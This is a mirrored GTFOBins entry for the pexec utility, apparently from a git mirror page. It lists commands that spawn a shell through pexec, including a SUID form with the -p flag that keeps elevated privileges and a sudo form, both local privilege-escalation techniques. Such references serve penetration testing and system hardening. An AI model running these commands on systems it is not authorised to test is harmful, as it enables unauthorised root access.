mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
16e426e98c
install: apt-get install -y pexec man: https://manpages.ubuntu.com/manpages/trusty/man1/pexec.1.html
10 lines
132 B
Markdown
10 lines
132 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: pexec /bin/sh
|
|
suid:
|
|
- code: ./pexec /bin/sh -p
|
|
sudo:
|
|
- code: sudo pexec /bin/sh
|
|
---
|